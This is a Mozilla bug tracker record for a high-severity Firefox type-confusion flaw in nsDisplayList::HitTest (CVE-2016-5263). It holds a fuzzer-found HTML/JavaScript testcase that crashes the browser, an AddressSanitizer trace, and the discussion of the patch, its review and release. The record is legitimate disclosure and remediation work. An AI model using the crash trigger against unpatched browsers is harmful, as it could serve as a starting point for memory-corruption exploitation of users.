Closed Bug 1276897 (CVE-2016-5263) Opened 3 years ago Closed 3 years ago

Type confusion in nsDisplayList::HitTest

Categories

(Core :: Layout, defect)

49 Branch
defect
Not set

Tracking

()

VERIFIED FIXED
mozilla50
Tracking Status
firefox47 --- wontfix
firefox48 + verified
firefox49 + verified
firefox-esr45 --- unaffected
firefox50 + verified

People

(Reporter: nils, Assigned: mattwoodrow)

References

Details

(Keywords: csectype-other, regression, sec-high, Whiteboard: [adv-main48+])

Attachments

(1 file)

The following testcase crashes the latest ASAN build of Firefox (buildId 20160523171639).

Testcase (might need a few reloads or a mouse over):

<script>
function start() {
        o37=document.createElement('iframe');
        o122=document.createElement('th');
        o46=document.createElement('iframe');
        o59=document.createElement('input');
        o37.setAttribute('style',"box-shadow:; mix-blend-mode: hard-light; ");
        o528=document.createElement('iframe');
        o122.appendChild(o528);
        o586=document.createElement('tfoot');
        o711=(new DOMParser()).parseFromString(" x<code><output>a<em><tt><noscript></code>",'text/html');
        o718=o711.all[6];
        o720=o711.all[8];
        o720.appendChild(o37);
        o718.appendChild(o46);
        o718.appendChild(o59);
        o720.appendChild(o122);
        o720.appendChild(o586);
        o586.innerHTML="<style>@keyframes{{}}* { perspective: 1cm}{:}\n*{ transform-style: preserve-3d;</style><style id>*{ outline-style: auto;:; float: left</style></svg>";
        document.replaceChild(o711.documentElement,document.documentElement);
}
</script>
<body onload="start()"></body>


ASAN output:

ASAN detected this as a heap-buffer-overflow before minimising. Probably because an adjacent object was allocated.

=================================================================
==5201==ERROR: AddressSanitizer: use-after-poison on address 0x621000a893de at pc 0x7fae8f81b1a0 bp 0x7fffd50a1ff0 sp 0x7fffd50a1fe8
READ of size 1 at 0x621000a893de thread T0 (Web Content)
    #0 0x7fae8f81b19f in IsTransformSeparator /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.h:4159
    #1 0x7fae8f81b19f in IsLeafOf3DContext /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.h:4165
    #2 0x7fae8f81b19f in nsDisplayList::HitTest(nsDisplayListBuilder*, nsRect const&, nsDisplayItem::HitTestState*, nsTArray<nsIFrame*>*) const /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.cpp:2064
    #3 0x7fae8f819f36 in nsDisplayList::HitTest(nsDisplayListBuilder*, nsRect const&, nsDisplayItem::HitTestState*, nsTArray<nsIFrame*>*) const /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.cpp:2080
    #4 0x7fae8f85a548 in nsDisplayTransform::HitTest(nsDisplayListBuilder*, nsRect const&, nsDisplayItem::HitTestState*, nsTArray<nsIFrame*>*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.cpp:6135
    #5 0x7fae8f819f36 in nsDisplayList::HitTest(nsDisplayListBuilder*, nsRect const&, nsDisplayItem::HitTestState*, nsTArray<nsIFrame*>*) const /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.cpp:2080
    #6 0x7fae8f8ca38c in nsLayoutUtils::GetFramesForArea(nsIFrame*, nsRect const&, nsTArray<nsIFrame*>&, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsLayoutUtils.cpp:3122
    #7 0x7fae8f8c99de in nsLayoutUtils::GetFrameForPoint(nsIFrame*, nsPoint, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsLayoutUtils.cpp:3074
    #8 0x7fae8f6fbdeb in mozilla::FindFrameTargetedByInputEvent(mozilla::WidgetGUIEvent*, nsIFrame*, nsPoint const&, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/PositionedEventTargeting.cpp:548
    #9 0x7fae8f96a204 in PresShell::HandleEvent(nsIFrame*, mozilla::WidgetGUIEvent*, bool, nsEventStatus*, nsIContent**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsPresShell.cpp:7903
    #10 0x7fae8ef8e9bb in nsViewManager::DispatchEvent(mozilla::WidgetGUIEvent*, nsView*, nsEventStatus*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/view/nsViewManager.cpp:814
    #11 0x7fae8ef86fc9 in nsView::HandleEvent(mozilla::WidgetGUIEvent*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/view/nsView.cpp:1121
    #12 0x7fae8efd0ffc in mozilla::widget::PuppetWidget::DispatchEvent(mozilla::WidgetGUIEvent*, nsEventStatus&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/widget/PuppetWidget.cpp:345
    #13 0x7fae8aea3ef1 in mozilla::layers::APZCCallbackHelper::DispatchWidgetEvent(mozilla::WidgetGUIEvent&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/gfx/layers/apz/util/APZCCallbackHelper.cpp:469
    #14 0x7fae8e99a5d2 in mozilla::dom::TabChild::RecvRealMouseButtonEvent(mozilla::WidgetMouseEvent const&, mozilla::layers::ScrollableLayerGuid const&, unsigned long const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/ipc/TabChild.cpp:1909
    #15 0x7fae8e99a90c in RecvRealMouseMoveEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/ipc/TabChild.cpp:1886
    #16 0x7fae8e99a90c in non-virtual thunk to mozilla::dom::TabChild::RecvRealMouseMoveEvent(mozilla::WidgetMouseEvent const&, mozilla::layers::ScrollableLayerGuid const&, unsigned long const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/ipc/Unified_cpp_dom_ipc1.cpp:1887
    #17 0x7fae8a07345b in mozilla::dom::PBrowserChild::OnMessageReceived(IPC::Message const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/PBrowserChild.cpp:3015
    #18 0x7fae8a1d75cb in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/PContentChild.cpp:6441
    #19 0x7fae8995fc33 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1655
    #20 0x7fae8995c765 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1593
    #21 0x7fae89949fd2 in mozilla::ipc::MessageChannel::OnMaybeDequeueOne() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1560
    #22 0x7fae8996f8d0 in applyImpl<mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()> /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:707
    #23 0x7fae8996f8d0 in apply<mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()> /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:713
    #24 0x7fae8996f8d0 in nsRunnableMethodImpl<bool (mozilla::ipc::MessageChannel::*)(), false, true>::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:741
    #25 0x7fae8997039f in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:477
    #26 0x7fae8997039f in mozilla::ipc::MessageChannel::DequeueTask::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:496
    #27 0x7fae88bdd8db in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:1073
    #28 0x7fae88c57e2a in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290
    #29 0x7fae89967562 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:130
    #30 0x7fae898dc22c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:235
    #31 0x7fae898dc22c in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:228
    #32 0x7fae898dc22c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:208
    #33 0x7fae8eff0447 in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/widget/nsBaseAppShell.cpp:156
    #34 0x7fae9100b342 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:809
    #35 0x7fae898dc22c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:235
    #36 0x7fae898dc22c in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:228
    #37 0x7fae898dc22c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:208
    #38 0x7fae9100aa21 in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:644
    #39 0x48df67 in content_process_main(int, char**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/app/../contentproc/plugin-container.cpp:231
    #40 0x7fae8641882f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #41 0x48cb3c in _start (/home/nils/fuzzer3/firefox/plugin-container+0x48cb3c)

0x621000a893de is located 3806 bytes inside of 4096-byte region [0x621000a88500,0x621000a89500)
allocated by thread T0 (Web Content) here:
    #0 0x475151 in __interceptor_malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74
    #1 0x7fae964c475a in PL_ArenaAllocate /builds/slave/m-cen-l64-asan-000000000000000/build/src/nsprpub/lib/ds/plarena.c:210
    #2 0x7fae8f805a82 in nsDisplayListBuilder::Allocate(unsigned long) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.cpp:1062
    #3 0x7fae8fa8e71e in operator new /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.h:1359
    #4 0x7fae8fa8e71e in WrapSeparatorTransform /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2145
    #5 0x7fae8fa8e71e in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&, nsDisplayList*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2479
    #6 0x7fae8fa39d7c in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2813
    #7 0x7fae8fa17997 in DisplayLine(nsDisplayListBuilder*, nsRect const&, nsRect const&, nsLineList_iterator&, int, int&, nsDisplayListSet const&, nsBlockFrame*, mozilla::css::TextOverflow*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6505
    #8 0x7fae8fa15d2b in nsBlockFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6597
    #9 0x7fae8fa8d24b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&, nsDisplayList*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2337
    #10 0x7fae8fa39d7c in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2813
    #11 0x7fae8fa17997 in DisplayLine(nsDisplayListBuilder*, nsRect const&, nsRect const&, nsLineList_iterator&, int, int&, nsDisplayListSet const&, nsBlockFrame*, mozilla::css::TextOverflow*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6505
    #12 0x7fae8fa15d2b in nsBlockFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6597
    #13 0x7fae8fa8d24b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&, nsDisplayList*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2337
    #14 0x7fae8fa39d7c in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2813
    #15 0x7fae8fa17997 in DisplayLine(nsDisplayListBuilder*, nsRect const&, nsRect const&, nsLineList_iterator&, int, int&, nsDisplayListSet const&, nsBlockFrame*, mozilla::css::TextOverflow*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6505
    #16 0x7fae8fa15d2b in nsBlockFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6597
    #17 0x7fae8fa8d24b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&, nsDisplayList*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2337
    #18 0x7fae8fa39d7c in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2813
    #19 0x7fae8fa17997 in DisplayLine(nsDisplayListBuilder*, nsRect const&, nsRect const&, nsLineList_iterator&, int, int&, nsDisplayListSet const&, nsBlockFrame*, mozilla::css::TextOverflow*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6505
    #20 0x7fae8fa15d2b in nsBlockFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6597
    #21 0x7fae8fa8d24b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&, nsDisplayList*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2337
    #22 0x7fae8fa39d7c in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2813
    #23 0x7fae8fa17997 in DisplayLine(nsDisplayListBuilder*, nsRect const&, nsRect const&, nsLineList_iterator&, int, int&, nsDisplayListSet const&, nsBlockFrame*, mozilla::css::TextOverflow*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6505
    #24 0x7fae8fa15d2b in nsBlockFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6597
    #25 0x7fae8fa8d24b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&, nsDisplayList*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2337
    #26 0x7fae8fa39d7c in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2813
    #27 0x7fae8fa3692e in nsCanvasFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsCanvasFrame.cpp:491
    #28 0x7fae8fa3af62 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2849
    #29 0x7fae8fb0214c in mozilla::ScrollFrameHelper::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsGfxScrollFrame.cpp:3379
    #30 0x7fae8fa3af62 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2849
    #31 0x7fae8fc7fd41 in ViewportFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsViewportFrame.cpp:61

SUMMARY: AddressSanitizer: use-after-poison /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.h:4159 IsTransformSeparator
Shadow bytes around the buggy address:
  0x0c4280149220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4280149230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4280149240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4280149250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4280149260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c4280149270: 00 00 00 00 00 00 00 00 00 f7 f7[f7]f7 f7 f7 f7
  0x0c4280149280: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c4280149290: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c42801492a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c42801492b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c42801492c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Contiguous container OOB:fc
  ASan internal:           fe
==5201==ABORTING
Group: core-security → layout-core-security
Component: DOM: Core & HTML → Layout
Does ASAN give the stack for when it was poisoned?
I'm pretty sure this is just an invalid static_cast. nsDisplayTransform is pretty bug (has 2 64byte Matrix4x4 object before the member being accessed), so it seems likely we're just reading beyond the bounds of what we have allocated.
Assignee: nobody → matt.woodrow
Attached patch invalid-castSplinter Review
Attachment #8758504 - Flags: review?(tlee)
[oops, sorry for flag-clearing; tweaked the wrong bug.]
Keywords: sec-high
Attachment #8758504 - Flags: review?(tlee) → review+
Looking at the code, it looks like we're affected all the way back to 47 (which is just about to ship). 46 looks to have been unaffected, but we no longer have flags for that.
Comment on attachment 8758504 [details] [diff] [review]
invalid-cast

[Security approval request comment]
>How easily could an exploit be constructed based on the patch?

I'm not sure. It's pretty obvious that it's an invalid cast, but I'm not sure how easy it is to exploit that.

>Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?

No.

>Which older supported branches are affected by this flaw?

47 and above. 46 is unaffected.

>If not all supported branches, which bug introduced the flaw?

Bug 1226904

>Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?

I haven't checked, but the current patch should apply to all branches.

>How likely is this patch to cause regressions; how much testing does it need?

Very unlikely to cause regressions.
Attachment #8758504 - Flags: sec-approval?
Sec-approval+ for checkin on June 21 (two weeks into the new cycle).
Whiteboard: [checkin on 6/21]
Attachment #8758504 - Flags: sec-approval? → sec-approval+
Tracking since it's sec critical
Blocks: 1226904
Flags: sec-bounty?
Matt, don't forget to land this patch when you're back.
Flags: needinfo?(matt.woodrow)
(In reply to Mats Palmgren (:mats) from comment #9)
> Matt, don't forget to land this patch when you're back.

done 

https://hg.mozilla.org/integration/mozilla-inbound/rev/5b09c44427fd
Flags: needinfo?(matt.woodrow)
Keywords: checkin-needed
Whiteboard: [checkin on 6/21]
https://hg.mozilla.org/mozilla-central/rev/c9fa56422289
Status: NEW → RESOLVED
Closed: 3 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla50
Flags: sec-bounty? → sec-bounty+
Group: layout-core-security → core-security-release
Matt can you also request uplift since this is sec-high? We could still get it into aurora and into beta 9 next monday. Thanks!
Flags: needinfo?(matt.woodrow)
Comment on attachment 8758504 [details] [diff] [review]
invalid-cast

Approval Request Comment
[Feature/regressing bug #]: Bug 1226904
[User impact if declined]: Security bug
[Describe test coverage new/current, TreeHerder]: Tested manually.
[Risks and why]: Very low risk, pretty obvious invalid cast.
[String/UUID change made/needed]: None.
Flags: needinfo?(matt.woodrow)
Attachment #8758504 - Flags: approval-mozilla-beta?
Attachment #8758504 - Flags: approval-mozilla-aurora?
Comment on attachment 8758504 [details] [diff] [review]
invalid-cast

sec-high, taking it.
Should be in 48 rc
Attachment #8758504 - Flags: approval-mozilla-beta?
Attachment #8758504 - Flags: approval-mozilla-beta+
Attachment #8758504 - Flags: approval-mozilla-aurora?
Attachment #8758504 - Flags: approval-mozilla-aurora+
Flags: qe-verify+
Unable to crash Nightly asan & debug builds from 2016-05-23, under Ubuntu 16.04 64-bit and Mac OS X 10.11.1. Although, the following output was displayed in the Terminal:
[Parent 601] ###!!! ASSERTION: Why do we still have a child doc?: '!mOuterDoc', file /builds/slave/m-cen-m64-d-000000000000000000/build/src/accessible/ipc/ProxyAccessible.cpp, line 26
WARNING: NS_ENSURE_TRUE(mBoundFrame) failed: file /builds/slave/m-cen-m64-d-000000000000000000/build/src/dom/html/nsTextEditorState.cpp, line 1722
The above Terminal output was not reproducible with Firefox 48 beta 10, latest Dev Edition 49.0a2 and Nightly 50.0a1, across platforms [1]. Matt, any idea why i couldn't reproduce the crash on a known bad build? Thanks in advance!

[1] Windows 10 64-bit, Ubuntu 16.04 64-bit and Mac OS X 10.11.1
Flags: needinfo?(matt.woodrow)
(In reply to Alexandra Lucinet, QA Mentor [:adalucinet] from comment #19)
> Unable to crash Nightly asan & debug builds from 2016-05-23, under Ubuntu
> 16.04 64-bit and Mac OS X 10.11.1. Although, the following output was
> displayed in the Terminal:
> [Parent 601] ###!!! ASSERTION: Why do we still have a child doc?:
> '!mOuterDoc', file
> /builds/slave/m-cen-m64-d-000000000000000000/build/src/accessible/ipc/
> ProxyAccessible.cpp, line 26
> WARNING: NS_ENSURE_TRUE(mBoundFrame) failed: file
> /builds/slave/m-cen-m64-d-000000000000000000/build/src/dom/html/
> nsTextEditorState.cpp, line 1722
> The above Terminal output was not reproducible with Firefox 48 beta 10,
> latest Dev Edition 49.0a2 and Nightly 50.0a1, across platforms [1]. Matt,
> any idea why i couldn't reproduce the crash on a known bad build? Thanks in
> advance!
> 
> [1] Windows 10 64-bit, Ubuntu 16.04 64-bit and Mac OS X 10.11.1

I don't sorry, I had real problems reproducing it too. It seems to be intermittent.
Flags: needinfo?(matt.woodrow)
Alias: CVE-2016-5263
Whiteboard: [adv-main48+]
Matt, thanks for your prompt reply!
Since the assertion is no longer visible and I'm unable to reproduce after several attempts with latest builds, across platforms, I think we're safe to call this issue verified. Marking accordingly.
Status: RESOLVED → VERIFIED
Flags: qe-verify+
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.